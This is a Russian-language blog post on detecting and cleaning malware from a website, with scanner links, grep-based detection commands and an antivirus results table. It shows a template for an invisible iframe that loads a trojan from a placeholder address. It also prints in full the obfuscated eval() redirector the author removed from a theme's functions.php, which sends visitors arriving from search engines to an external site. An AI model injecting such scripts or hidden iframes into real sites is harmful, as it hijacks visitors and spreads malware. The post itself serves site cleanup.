На сайте обнаружен вирус

Сайт с вирусами и троянами встретить в сети очень просто. Чаще всего, вредоносный код атакует компьютеры на порно сайтах, или сайтах сомнительного содержания, которые вообще редко бывают без вирусов.

 


Что делать, если на сайте вирус?

  1. Изменить пароли доступа на сайт по FTP. Это стоит сделать прежде каких либо других.
  2. Проверить свой компьютер на вирусы. Желательно делать это антивирусов отличным от установленного.
  3. Очистить кэш браузера, и использовать в дальнейшем Мозилла.
  4. НЕ сохранять пароли в программах.

Ссылки для проверки сайта на вирусы:

http://www.google.com/safebrowsing/diagnostic?site=ВАШ-САЙТ.РУ&hl=ru
http://vms.drweb.com/online/
http://antivirus-alarm.ru/proverka/
http://2ip.ru/site-virus-scaner/
https://www.virustotal.com/
http://burbon.ru/service/virus.php
http://urlvoid.com/
http://xseo.in/viruscan

Как найти вирус на сайте?

Первое, на что следует искать — это HTML код с подключением <iframe>. Подобные фреймы можно сделать незаметными для посетителей сайта, указав специальные параметры. Например, width="0" height="0" — это сделает их невидимыми на страницах.

Например, код вставки вируса может выглядеть так:

<iframe src="http://АДРЕС_ДО_ТРОЯНА" width="0" height="0" style="hidden" frameborder="0" marginheight="0" marginwidth="0" scrolling="no"></iframe>
Если есть доступ до сайта по ssh, то можете воспользоваться следующими командами:
find $PWD -name '*.*' -exec grep -li "iframe" {} \;
find $PWD -name '*.*' -exec grep -li "unescape" {} \;
find $PWD -name '*.*' -exec grep -li "fromCharCode" {} \;
В результате мы получим список файлов содержащий код, который может являться вирусом. Но не спешите его удалять, так как много плагинов используют фреймы и вполне безопасны.
Лечение сайта от вируса на моём примере:

На сайте, который проверял http://antivirus-alarm.ru/proverka/ вывелись такие результаты:

Антивирусная база Результат
nProtect Trojan.JS.Redirector.ZT
CAT-QuickHeal вирусов нет
McAfee вирусов нет
TheHacker вирусов нет
K7AntiVirus вирусов нет
VirusBuster вирусов нет
NOD32 JS/Redirector.NIL
F-Prot вирусов нет
Symantec вирусов нет
Norman вирусов нет
ByteHero вирусов нет
TrendMicro-HouseCall вирусов нет
Avast JS:Redirector-MR [Trj]
eSafe вирусов нет
ClamAV PUA.Script.Packed-1
Kaspersky Trojan.JS.Redirector.ux
BitDefender Trojan.JS.Redirector.ZT
ViRobot вирусов нет
Emsisoft Trojan.Script!IK
Comodo вирусов нет
F-Secure Trojan.JS.Redirector.ZT
DrWeb вирусов нет
VIPRE вирусов нет
AntiVir вирусов нет
TrendMicro вирусов нет
McAfee-GW-Edition вирусов нет
Sophos вирусов нет
eTrust-Vet вирусов нет
Jiangmin вирусов нет
Antiy-AVL вирусов нет
Microsoft Trojan:JS/Redirector.IT
SUPERAntiSpyware вирусов нет
Prevx вирусов нет
GData Trojan.JS.Redirector.ZT
Commtouch вирусов нет
AhnLab-V3 HTML/Redirect
VBA32 вирусов нет
PCTools вирусов нет
Rising вирусов нет
Ikarus Trojan.Script
Fortinet вирусов нет
AVG вирусов нет
Panda вирусов нет

в папке темы в файле functions.php удалил следуюший код:

<script language=\"JavaScript\">eval (function (p,a,c,k,e,r){e=function©{return (c<a?'':e (parseInt (c/a)))+((c=c%a)>35?String.fromCharCode (c+29):c.toString (36))};if (!''.replace (/^/,String)){while (c--) r[e(c)]=k[c]||e©;k=[function(e){return r[e]}];e=function (){return'\\\w+'};c=1};while (c--) if (k[c]) p=p.replace (new RegExp ('\\\b'+e©+'\\\b','g'),k[c]);return p}('e r=x.9,t=\"\",q;4 (r.3 (\"m.\")!=-1) t=\"q\";4 (r.3 (\"7.\")!=-1) t=\"q\";4 (r.3 (\"8.\")!=-1) t=\"p\";4 (r.3 (\"a.\")!=-1) t=\"q\";4 (r.3 (\"f.\")!=-1) t=\"g\";4 (r.3 (\"j.\")!=-1) t=\"q\";4 (t.6&&((q=r.3 (\"?\"+t+\"=\"))!=-1||(q=r.3 (\"&\"+t+\"=\"))!=-1)) B.C=\"v\"+\"w\"+\":/\"+\"/A\"+\"b\"+\"k\"+\"5\"+\"h.\"+\"c\"+\"z/s\"+\"u\"+\"5\"+\"h.p\"+\"d?\"+\"t\"+\"y=1&t\"+\"i\"+\"l=\"+r.n (q+2+t.6).o (\"&\")[0];',39,39,'|||indexOf|if|rc|length|msn|yahoo|referrer|altavista|ogo|bi|hp|var|aol|query||er|ask|sea|ms|google|substring|split||||||ea|ht|tp|document|||go|window|location'.split ('|'),0,{}))</script>

Остались или есть ещё вопросы? Задавайте!
(не забудьте указать ссылку на этот пост)




Один комментарий

  1. К сожалению тема не раскрыта. Как именно найти вредоносный код, об этом у вас практически ничего не сказано. Доступ по ssh есть далеко не у всех владельцев сайтов. А  у кого есть, большинство не знает как работать с этим протоколом.

    Thumb up 0 Thumb down 0

Оставить комментарий

Установка, настройка, мониторинг и администрирование linux, unix, windows систем